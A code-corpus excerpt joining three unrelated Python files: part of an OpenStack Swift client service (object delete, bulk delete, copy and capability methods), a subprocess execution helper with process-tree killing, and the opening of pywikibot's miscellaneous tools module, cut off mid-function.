res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: The list of objects to delete.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'prefix': None,
'header': [],
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
if options['prefix']:
objects = [obj for obj in objects
if obj.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
bulk_page_size = self._bulk_delete_page_size(objects)
if bulk_page_size > 1:
page_at_a_time = n_at_a_time(objects, bulk_page_size)
for page_slice in page_at_a_time:
for obj_slice in n_groups(
page_slice,
self._options['object_dd_threads']):
self._bulk_delete(container, obj_slice, options,
obj_dels)
else:
self._per_item_delete(container, objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast']
and not res['success']):
cancelled = True
def _bulk_delete_page_size(self, objects):
'''
Given the iterable 'objects', will return how many items should be
deleted at a time.
:param objects: An iterable that supports 'len()'
:returns: The bulk delete page size (i.e. the max number of
objects that can be bulk deleted at once, as reported by
the cluster). If bulk delete is disabled, return 1
'''
if len(objects) <= 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return 1
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return 1
except ClientException:
# Old swift, presumably; assume no bulk middleware
return 1
swift_info = cap_result['capabilities']
if 'bulk_delete' in swift_info:
return swift_info['bulk_delete'].get(
'max_deletes_per_request', 10000)
else:
return 1
def _per_item_delete(self, container, objects, options, rdict, rq):
for obj in objects:
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
conn.delete_object(container, obj, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
def _delete_object(self, conn, container, obj, options,
results_queue=None):
_headers = {}
_headers = split_headers(options.get('header', []))
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_string = None
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj,
headers=_headers)
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_string = 'multipart-manifest=delete'
except ClientException as err:
if err.http_status != 404:
raise
results_dict = {}
conn.delete_object(container, obj,
headers=_headers,
query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container, options):
results_dict = {}
_headers = {}
_headers = split_headers(options.get('header', []))
try:
conn.delete_container(container, headers=_headers,
response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
for res in self.delete(
container=container,
objects=[o['name'] for o in part['listing']],
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container, options
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
res.update({'success': False, 'error': e})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Copy related methods
#
def copy(self, container, objects, options=None):
"""
Copy operations on a list of objects in a container. Destination
containers will be created.
:param container: The container from which to copy the objects.
:param objects: A list of object names (strings) or SwiftCopyObject
instances containing an object name and an
options dict (can be None) to override the options for
that individual copy operation::
[
'object_name',
SwiftCopyObject(
'object_name',
options={
'destination': '/container/object',
'fresh_metadata': False,
...
}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all copy operations
performed by this call, unless overridden on a per
object basis.
The options "destination" and "fresh_metadata" do
not need to be set, in this case objects will be
copied onto themselves and metadata will not be
refreshed.
The option "destination" can also be specified in the
format '/container', in which case objects without an
explicit destination will be copied to the destination
/container/original_object_name. Combinations of
multiple objects and a destination in the format
'/container/object' is invalid. Possible options are
given below::
{
'meta': [],
'header': [],
'destination': '/container/object',
'fresh_metadata': False,
}
:returns: A generator returning the results of copying the given list
of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object COPY.
containers = set(
next(p for p in obj.destination.split("/") if p)
for obj in objects
if isinstance(obj, SwiftCopyObject) and obj.destination
)
if options.get('destination'):
destination_split = options['destination'].split('/')
if destination_split[0]:
raise SwiftError("destination must be in format /cont[/obj]")
_str_objs = [
o for o in objects if not isinstance(o, SwiftCopyObject)
]
if len(destination_split) > 2 and len(_str_objs) > 1:
# TODO (clayg): could be useful to copy multiple objects into
# a destination like "/container/common/prefix/for/objects/"
# where the trailing "/" indicates the destination option is a
# prefix!
raise SwiftError("Combination of multiple objects and "
"destination including object is invalid")
if destination_split[-1] == '':
# N.B. this protects the above case
raise SwiftError("destination can not end in a slash")
containers.add(destination_split[1])
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = _header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, cont, headers=policy_header)
for cont in containers
]
# wait for container creation jobs to complete before any COPY
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
copy_futures = []
copy_objects = self._make_copy_objects(objects, options)
for copy_object in copy_objects:
obj = copy_object.object_name
obj_options = copy_object.options
destination = copy_object.destination
fresh_metadata = copy_object.fresh_metadata
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
copy = self.thread_manager.object_uu_pool.submit(
self._copy_object_job, container, obj, destination,
headers, fresh_metadata
)
copy_futures.append(copy)
for r in interruptable_as_completed(copy_futures):
res = r.result()
yield res
@staticmethod
def _make_copy_objects(objects, options):
copy_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftCopyObject(o, options)
copy_objects.append(obj)
elif isinstance(o, SwiftCopyObject):
copy_objects.append(o)
else:
raise SwiftError(
"The copy operation takes only strings or "
"SwiftCopyObjects as input",
obj=o)
return copy_objects
@staticmethod
def _copy_object_job(conn, container, obj, destination, headers,
fresh_metadata):
response_dict = {}
res = {
'success': True,
'action': 'copy_object',
'container': container,
'object': obj,
'destination': destination,
'headers': headers,
'fresh_metadata': fresh_metadata,
'response_dict': response_dict
}
try:
conn.copy_object(
container, obj, destination=destination, headers=headers,
fresh_metadata=fresh_metadata, response_dict=response_dict)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities.
:returns: A dictionary containing the capabilities of the cluster.
:raises ClientException:
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue
If the future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
exec_proc_.py
|
import os
import signal
import subprocess
import sys
import types
from contextlib import contextmanager
from logging import getLogger
from threading import Thread
from typing import *
__all__ = ['timed_wait_proc', 'exec_proc']
OutputCallbackType = Callable[[bytes], None]
def timed_wait_proc(proc: subprocess.Popen, timeout: float) -> Optional[int]:
"""
Wait a process for at most `timeout` seconds.
Args:
proc: The process to wait.
timeout: The timeout seconds.
Returns:
The exit code, or :obj:`None` if the process does not exit.
"""
try:
return proc.wait(timeout)
except subprocess.TimeoutExpired:
return None
def recursive_kill(proc: subprocess.Popen,
ctrl_c_timeout: float = 3,
kill_timeout: float = 10) -> Optional[int]:
"""
Recursively kill a process tree.
Args:
proc: The process to kill.
ctrl_c_timeout: Seconds to wait for the program to respond to
CTRL+C signal.
kill_timeout: Seconds to wait for the program to be killed.
Returns:
The return code, or None if the process cannot be killed.
"""
if sys.platform != 'win32':
try:
gid = os.getpgid(proc.pid)
except Exception:
# indicate pid does not exist
return
def kill_fn(s):
os.killpg(gid, s)
else: # pragma: no cover
def kill_fn(s):
if s == signal.SIGINT:
os.kill(proc.pid, signal.CTRL_C_EVENT)
else:
proc.terminate()
# try to kill the process by ctrl+c
kill_fn(signal.SIGINT)
code = timed_wait_proc(proc, ctrl_c_timeout)
if code is None:
getLogger(__name__).info(
f'Failed to kill sub-process {proc.pid} by SIGINT, plan to kill '
f'it by SIGTERM or SIGKILL.')
else:
return code
# try to kill the process by SIGTERM
if sys.platform != 'win32':
kill_fn(signal.SIGTERM)
code = timed_wait_proc(proc, kill_timeout)
if code is None:
getLogger(__name__).info(
f'Failed to kill sub-process {proc.pid} by SIGTERM, plan to '
f'kill it by SIGKILL.')
else:
return code
# try to kill the process by SIGKILL
kill_fn(signal.SIGKILL)
code = timed_wait_proc(proc, kill_timeout)
if code is None:
getLogger(__name__).info(
f'Failed to kill sub-process {proc.pid} by SIGKILL, give up.')
return code
@contextmanager
def exec_proc(args: Union[str, Iterable[str]],
on_stdout: OutputCallbackType = None,
on_stderr: OutputCallbackType = None,
stderr_to_stdout: bool = False,
buffer_size: int = 16 * 1024,
ctrl_c_timeout: float = 3,
**kwargs) -> Generator[subprocess.Popen, None, None]:
"""
Execute an external program within a context.
Args:
args: Command line or arguments of the program.
If it is a command line, then `shell = True` will be set.
on_stdout: Callback for capturing stdout.
on_stderr: Callback for capturing stderr.
stderr_to_stdout: Whether or not to redirect stderr to stdout?
If specified, `on_stderr` will be ignored.
buffer_size: Size of buffers for reading from stdout and stderr.
ctrl_c_timeout: Seconds to wait for the program to respond to
CTRL+C signal.
\\**kwargs: Other named arguments passed to :func:`subprocess.Popen`.
Yields:
The process object.
"""
# check the arguments
if stderr_to_stdout:
kwargs['stderr'] = subprocess.STDOUT
on_stderr = None
if on_stdout is not None:
kwargs['stdout'] = subprocess.PIPE
if on_stderr is not None:
kwargs['stderr'] = subprocess.PIPE
# output reader
def reader_func(fd, action):
while not stopped[0]:
buf = os.read(fd, buffer_size)
if not buf:
break
action(buf)
def make_reader_thread(fd, action):
th = Thread(target=reader_func, args=(fd, action))
th.daemon = True
th.start()
return th
# internal flags
stopped = [False]
# launch the process
stdout_thread = None # type: Thread
stderr_thread = None # type: Thread
if isinstance(args, (str, bytes)):
shell = True
else:
args = tuple(args)
shell = False
if sys.platform != 'win32':
kwargs.setdefault('preexec_fn', os.setsid)
proc = subprocess.Popen(args, shell=shell, **kwargs)
# patch the kill() to ensure the whole process group would be killed,
# in case `shell = True`.
def my_kill(self, ctrl_c_timeout=ctrl_c_timeout):
recursive_kill(self, ctrl_c_timeout=ctrl_c_timeout)
proc.kill = types.MethodType(my_kill, proc)
try:
if on_stdout is not None:
stdout_thread = make_reader_thread(proc.stdout.fileno(), on_stdout)
if on_stderr is not None:
stderr_thread = make_reader_thread(proc.stderr.fileno(), on_stderr)
try:
yield proc
except KeyboardInterrupt: # pragma: no cover
if proc.poll() is None:
# Wait for a while to ensure the program has properly dealt
# with the interruption signal. This will help to capture
# the final output of the program.
# TODO: use signal.signal instead for better treatment
_ = timed_wait_proc(proc, 1)
finally:
if proc.poll() is None:
proc.kill()
# Wait for the reader threads to exit
stopped[0] = True
for th in (stdout_thread, stderr_thread):
if th is not None:
th.join()
# Ensure all the pipes are closed.
for f in (proc.stdout, proc.stderr, proc.stdin):
if f is not None:
try:
f.close()
except Exception: # pragma: no cover
getLogger(__name__).info(
'Failed to close a sub-process pipe.',
exc_info=True
)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""Miscellaneous helper functions (not wiki-dependent)."""
#
# (C) Pywikibot team, 2008-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id: 7e1c9c15b0d121bbe9e36717aa3be86d42ac86c0 $'
import collections
import gzip
import hashlib
import inspect
import itertools
import os
import re
import stat
import subprocess
import sys
import threading
import time
import types
from distutils.version import Version
from warnings import warn
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if not PY2:
import queue as Queue
StringTypes = basestring = (str,)
UnicodeType = unicode = str
else:
import Queue
StringTypes = types.StringTypes
UnicodeType = types.UnicodeType
from pywikibot.logging import debug
try:
import bz2
except ImportError as bz2_import_error:
try:
import bz2file as bz2
warn('package bz2 was not found; using bz2file', ImportWarning)
except ImportError:
warn('package bz2 and bz2file were not found', ImportWarning)
bz2 = bz2_import_error
if PYTHON_VERSION < (3, 5):
# although deprecated in 3 completely no message was emitted until 3.5
ArgSpec = inspect.ArgSpec
getargspec = inspect.getargspec
else:
ArgSpec = collections.namedtuple('ArgSpec', ['args', 'varargs', 'keywords',
'defaults'])
def getargspec(func):
"""Python 3 implementation using inspect.signature."""
sig = inspect.signature(func)
args = []
defaults = []
varargs = None
kwargs = None
for p in sig.parameters.values():
if p.kind == inspect.Parameter.VAR_POSITIONAL:
varargs = p.name
elif p.kind == inspect.Parameter.VAR_KEYWORD:
kwargs = p.name
else:
args += [p.name]
if p.default != inspect.Parameter.empty:
defaults += [p.default]
if defaults:
defaults = tuple(defaults)
else:
defaults = None
return ArgSpec(args, varargs, kwargs, defaults)
_logger = 'tools'
class _NotImplementedWarning(RuntimeWarning):
"""Feature that is no longer implemented."""
pass
class NotImplementedClass(object):
"""No implementation is available."""
def __init__(self, *args, **kwargs):
"""Constructor."""
raise NotImplementedError(
'%s: %s' % (self.__class__.__name__, self.__doc__))
if PYTHON_VERSION < (2, 7):
try:
import future.backports.misc
except ImportError:
warn("""
pywikibot support of Python 2.6 relies on package future for many features.
Please upgrade to Python 2.7+ or Python 3.3+, or run:
"pip install future>=0.15.0"
""", RuntimeWarning)
try:
from ordereddict import OrderedDict
except ImportError:
class OrderedDict(NotImplementedClass):
"""OrderedDict not found."""
pass
try:
from counter import Counter
except ImportError:
class Counter(NotImplementedClass):
"""Counter not found."""
pass
count = None
else:
Counter = future.backports.misc.Counter
OrderedDict = future.backports.misc.OrderedDict
try:
count = future.backports.misc.count
except AttributeError:
warn('Please update the "future" package to at least version '
'0.15.0 to use its count.', RuntimeWarning, 2)
count = None
del future
if count is None:
def count(start=0, step=1):
"""Backported C{count} to support keyword arguments and step."""
while True:
yield start
start += step
else:
Counter = collections.Counter
OrderedDict = collections.OrderedDict
count = itertools.count
def has_module(module):
"""Check whether a module can be imported."""
try:
__import__(module)
except ImportError:
return False
else:
return True
def empty_iterator():
# http://stackoverflow.com/a/13243870/473890
"""An iterator which does nothing."""
return
yield
def py2_encode_utf_8(func):
"""Decorator to optionally encode the string result of a function on Python 2.x."""
if PY2:
return lambda s: func(s).encode('utf-8')
else:
return func
class classproperty(object): # flake8: disable=N801
"""
Metaclass to accesss a class method as a property.
This class may be used as a decorator::
class Foo(object):
_bar = 'baz' # a class property
@classproperty
def bar(cls): # a class property method
return cls._bar
Foo.bar gives 'baz'.
"""
def __init__(self, cls_method):
"""Hold the class method."""
self.method = cls_method
def __get__(self, instance, owner):
"""Get the attribute of the owner class by its method."""
return self.method(owner)
class UnicodeMixin(object):
"""Mixin class to add __str__ method in Python 2 or 3."""
@py2_encode_utf_8
def __str__(self):
"""Return the unicode representation as the str representation."""
return self.__unicode__()
# From http://python3porting.com/preparing.html
class ComparableMixin(object):
"""Mixin class to allow comparing to other objects which are comparable."""
def __lt__(self, other):
"""Compare if self is less than other."""
return other > self._cmpkey()
def __le__(self, other):
"""Compare if self is less equals other."""
return other >= self._cmpkey()
def __eq__(self, other):
"""Compare if self is equal to other."""
return other == self._cmpkey()
def __ge__(self, other):
"""Compare if self is greater equals other."""
return other <= self._cmpkey()
def __gt__(self, other):
"""Compare if self is greater than other."""
return other < self._cmpkey()
def __ne__(self, other):
"""Compare if self is not equal to other."""
return other != self._cmpkey()
class DotReadableDict(UnicodeMixin):
"""Parent class of Revision() and FileInfo().
Provide:
- __getitem__(), __unicode__() and __repr__().
"""
def __getitem__(self, key):
"""Give access to class values by key.
Revision class may also give access to its values by keys
e.g. revid parameter may be assigned by revision['revid']
as well as revision.revid. This makes formatting strings with
% operator easier.
"""
return getattr(self, key)
def __unicode__(self):
"""Return string representation."""
# TODO: This is more efficient if the PY2 test is done during
# class instantiation, and not inside the method.
if not PY2:
return repr(self.__dict__)
else:
_content = u', '.join(
u'{0}: {1}'.format(k, v) for k, v in self.__dict__.items())
return u'{{{0}}}'.format(_content)
def __repr__(self):
"""Return a more complete string representation."""
return repr(self.__dict__)
class FrozenDict(dict):
"""
Frozen dict, preventing write after initialisation.
Raises TypeError if write attempted.
"""
def __init__(self, data=None, error=None):
"""
Constructor.
@param data: mapping to freeze
@type data: mapping
@param error: error message
@type error: basestring
"""
if data:
args = [data]
else:
args = []
super(FrozenDict, self).__init__(*args)
self._error = error or 'FrozenDict: not writable'
def update(self, *args, **kwargs):
"""Prevent updates."""
raise TypeError(self._error)
__setitem__ = update
def concat_options(message, line_length, options):
"""Concatenate options."""
indent = len(message) + 2
line_length -= indent
option_msg = u''
option_line = u''
for option in options:
if option_line:
option_line += ', '
# +1 for ','
if len(option_line) + len(option) + 1 > line_length:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line[:-1] # remove space
option_line = ''
option_line += option
if option_line:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line
return u'{0} ({1}):'.format(message, option_msg)
class LazyRegex(object):
"""
Regex object that obtains and compiles the regex on usage.
Instances behave like the object created using L{re.compile}.
"""
def __init__(self, pattern, flags=0):
"""
Constructor.
@param pattern: L{re} regex pattern
@type pattern: str or callable
@param flags: L{re.compile} flags
@type flags: int
"""
self.raw = pattern
self.flags = flags
super(LazyRegex, self).__init__()
@property
def raw(self):
"""Get raw property."""
if callable(self._raw):
self._raw = self._raw()
return self._raw
@raw.setter
def raw(self, value):
"""Set raw property."""
self._raw = value
self._compiled = None
@property
def flags(self):
"""Get flags property."""
return self._flags
@flags.setter
def flags(self, value):
"""Set flags property."""
self._flags = value
self._compiled = None
def __getattr__(self, attr):
"""Compile the regex and delegate all attribute to the regex."""
if self._raw:
if not self._compiled:
self._compiled = re.compile(self.raw, self.flags)
if hasattr(self._compiled, attr):
return getattr(self._compiled, attr)
raise AttributeError('%s: attr %s not recognised'
% (self.__class__.__name__, attr))
else:
raise AttributeError('%s.raw not set' % self.__class__.__name__)
class DeprecatedRegex(LazyRegex):
"""Regex object that issues a deprecation notice."""
def __init__(self, pattern, flags=0, name=None, instead=None):
"""
Constructor.
If name is None, the regex pattern will be used as part of
the deprecation warning.
@param name: name of the object that is deprecated
@type name: str or None
@param instead: if provided, will be used to specify the replacement
of the deprecated name
@type instead: str
"""
super(DeprecatedRegex, self).__init__(pattern, flags)
self._name = name or self.raw
self._instead = instead
def __getattr__(self, attr):
"""Issue deprecation warning."""
issue_deprecation_warning(
self._name, self._instead, 2)
return super(DeprecatedRegex, self).__getattr__(attr)
def first_lower(string):
"""
Return a string with the first character uncapitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].lower() + string[1:]
def first_upper(string):
"""
Return a string with the first character capitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].upper() + string[1:]
def normalize_username(username):
"""Normalize the username."""
if not username:
return None
username = re.sub('[_ ]+', ' ', username).strip()
return first_upper(username)
class MediaWikiVersion(Version):
"""
Version object to allow comparing 'wmf' versions with normal ones.
The version mainly consist of digits separated by periods. After that is a
suffix which may only be 'wmf<number>', 'alpha', 'beta<number>' or
'-rc.<number>' (the - and . are optional). They are considered from old to
new in that order with a version number without suffix is considered the
newest. This secondary difference is stored in an internal _dev_version
attribute.
Two versions are equal if their normal version and dev version are equal. A
version is greater if the normal version or dev version is greater. For
example:
1.24 < 1.24.1 < 1.25wmf1 < 1.25alpha < 1.25beta1 < 1.25beta2
< 1.25-rc-1 < 1.25-rc.2 < 1.25
Any other suffixes are considered invalid.
"""
MEDIAWIKI_VERSION = re.compile(
r'^(\d+(?:\.\d+)+)(-?wmf\.?(\d+)|alpha|beta(\d+)|-?rc\.?(\d+)|.*)?$')
@classmethod
def from_generator(cls, generator):
"""Create instance using the generator string."""
if not generator.startswith('MediaWiki '):
raise ValueError('Generator string ({0!r}) must start with '
'"MediaWiki "'.format(generator))
return cls(generator[len('MediaWiki '):])
def parse(self, vstring):
"""Parse version string."""
version_match = MediaWikiVersion.MEDIAWIKI_VERSION.match(vstring)
if not version_match:
raise ValueError('Invalid version number "{0}"'.format(vstring))
components = [int(n) for n in version_match.group(1).split('.')]
# The _dev_version numbering scheme might change. E.g. if a stage
# between 'alpha' and 'beta' is added, 'beta', 'rc' and stable releases
# are reassigned (beta=3, rc=4, stable=5).
if version_match.group(3): # wmf version
self._dev_version = (0, int(version_match.group(3)))
elif version_match.group(4):
self._dev_version = (2, int(version_match.group(4)))
elif version_match.group(5):
self._dev_version = (3, int(version_match.group(5)))
elif version_match.group(2) in ('alpha', '-alpha'):
self._dev_version = (1, )
else:
for handled in ('wmf', 'alpha', 'beta', 'rc'):
# if any of those pops up here our parser has failed
assert handled not in version_match.group(2), \
'Found "{0}" in "{1}"'.format(handled, version_match.group(2))
if version_match.group(2):
debug('Additional unused version part '
'"{0}"'.format(version_match.group(2)),
_logger)
self._dev_version = (4, )
self.suffix = version_match.group(2) or ''
self.version = tuple(components)
def __str__(self):
"""Return version number with optional suffix."""
return '.'.join(str(v) for v in self.version) + self.suffix
def _cmp(self, other):
if isinstance(other, basestring):
other = MediaWikiVersion(other)
if self.version > other.version:
return 1
if self.version < other.version:
return -1
if self._dev_version > other._dev_version:
return 1
if self._dev_version < other._dev_version:
return -1
return 0
if PY2:
__cmp__ = _cmp
class ThreadedGenerator(threading.Thread):
"""Look-ahead generator class.
Runs a generator in a separate thread and queues the results; can
be called like a regular generator.
Subclasses should override self.generator, I{not} self.run
Important: the generator thread will stop itself if the generator's
internal queue is exhausted; but, if the calling program does not use
all the generated values, it must call the generator's stop() method to
stop the background thread. Example usage:
>>> gen = ThreadedGenerator(target=range, args=(20,))
>>> try:
... data = list(gen)
... finally:
... gen.stop()
>>> data
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
"""
def __init__(self, group=None, target=None, name="GeneratorThread",
args=(), kwargs=None, qsize=65536):
"""Constructor. Takes same keyword arguments as threading.Thread.
target must be a generator function (or other callable that returns
an iterable object).
@param qsize: The size of the lookahead queue. The larger the qsize,
the more values will be computed in advance of use (which can eat
up memory and processor time).
@type qsize: int
"""
if kwargs is None:
kwargs = {}
if target:
self.generator = target
if not hasattr(self, "generator"):
raise RuntimeError("No generator for ThreadedGenerator to run.")
self.args, self.kwargs = args, kwargs
threading.Thread.__init__(self, group=group, name=name)
self.queue = Queue.Queue(qsize)
self.finished = threading.Event()
def __iter__(self):
"""Iterate results from the queue."""
if not self.isAlive() and not self.finished.isSet():
self.start()
# if there is an item in the queue, yield it, otherwise wait
while not self.finished.isSet():
try:
yield self.queue.get(True, 0.25)
except Queue.Empty:
pass
except KeyboardInterrupt:
self.stop()
def stop(self):
"""Stop the background thread."""
self.finished.set()
def run(self):
"""Run the generator and store the results on the queue."""
iterable = any(hasattr(self.generator, key)
for key in ('__iter__', '__getitem__'))
if iterable and not self.args and not self.kwargs:
self.__gen = self.generator
else:
self.__gen = self.generator(*self.args, **self.kwargs)
for result in self.__gen:
while True:
if self.finished.isSet():
return
try:
self.queue.put_nowait(result)
except Queue.Full:
time.sleep(0.25)
continue
break
# wait for queue to be emptied, then kill the thread
while not self.finished.isSet() and not self.queue.empty():
time.sleep(0.25)
self.stop()
def itergroup(iterable, size):
"""Make an iterator that returns lists of (up to) size items from iterable.
Example:
>>> i = itergroup(range(25), 10)
>>> print(next(i))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> print(next(i))
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
>>> print(next(i))
[20, 21, 22, 23, 24]
>>> print(next(i))
Traceback (most recent call last):
...
StopIteration
"""
group = []
for item in iterable:
group.append(item)
if len(group) == size:
yield group
group = []
if group:
yield group
def islice_with_ellipsis(iterable, *args, **kwargs):
u"""
Generator which yields the first n elements of the iterable.
If more elements are available and marker is True, it returns an extra
string marker as continuation mark.
Function takes the
and the additional keyword marker.
@param iterable: the iterable to work on
@type iterable: iterable
@param args: same args as:
- C{itertools.islice(iterable, stop)}
- C{itertools.islice(iterable, start, stop[, step])}
@keyword marker: element to yield if iterable still contains elements
after showing the required number.
Default value: '…'
No other kwargs are considered.
@type marker: str
"""
s = slice(*args)
marker = kwargs.pop('marker', '…')
try:
k, v = kwargs.popitem()
raise TypeError(
